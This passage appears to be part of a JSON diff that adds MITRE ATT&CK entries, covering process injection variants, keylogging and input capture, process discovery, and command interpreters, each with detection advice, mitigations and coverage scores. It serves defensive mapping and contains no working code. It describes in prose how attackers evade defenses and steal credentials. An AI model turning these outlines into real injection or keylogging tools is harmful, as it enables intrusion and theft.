Window Memory Injection", + "url": "https://attack.mitre.org/techniques/T1055/011", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.012", + "name": "Process Injection: Process Hollowing", + "url": "https://attack.mitre.org/techniques/T1055/012", + "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.013", + "name": "Process Injection: Process Doppelgänging", + "url": "https://attack.mitre.org/techniques/T1055/013", + "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nScan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1055.014", + "name": "Process Injection: VDSO Hijacking", + "url": "https://attack.mitre.org/techniques/T1055/014", + "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 2.715552380952381, + "adjusted_score": 2.715552380952381, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.1,6.2,6.8,13.2,13.7" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CM-5", + "CM-6", + "IA-2", + "SC-18", + "SC-7", + "SI-2", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1056", + "name": "Input Capture", + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).", + "url": "https://attack.mitre.org/techniques/T1056", + "tactics": [ + "Collection", + "Credential Access" + ], + "detection": "Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Driver: Driver Load", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Process: Process Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1056.001", + "name": "Input Capture: Keylogging", + "url": "https://attack.mitre.org/techniques/T1056/001", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", + "detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", + "mitigations": [] + }, + { + "tid": "T1056.002", + "name": "Input Capture: GUI Input Capture", + "url": "https://attack.mitre.org/techniques/T1056/002", + "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs) ", + "detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1056.003", + "name": "Input Capture: Web Portal Capture", + "url": "https://attack.mitre.org/techniques/T1056/003", + "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", + "detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1056.004", + "name": "Input Capture: Credential API Hooking", + "url": "https://attack.mitre.org/techniques/T1056/004", + "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n", + "detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.9916454987314285, + "adjusted_score": 0.9916454987314285, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1057", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.", + "url": "https://attack.mitre.org/techniques/T1057", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.3122352226228572, + "adjusted_score": 0.3122352226228572, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1059", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", + "url": "https://attack.mitre.org/techniques/T1059", + "tactics": [ + "Execution" + ], + "detection": "Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.\n\nIf scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Module: Module Load", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell", + "url": "https://attack.mitre.org/techniques/T1059/001", + "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", + "detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.", + "mitigations": [ + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1059.002", + "name": "Command and Scripting Interpreter: AppleScript", + "url": "https://attack.mitre.org/techniques/T1059/002", + "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)", + "detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1059.003", + "name": "Command and Scripting Interpreter: Windows Command Shell", + "url": "https://attack.mitre.org/techniques/T1059/003", + "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", + "detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1059.004", + "name": "Command and Scripting Interpreter: Unix Shell", + "url": "https://attack.mitre.org/techniques/T1059/004", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.", + "detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script 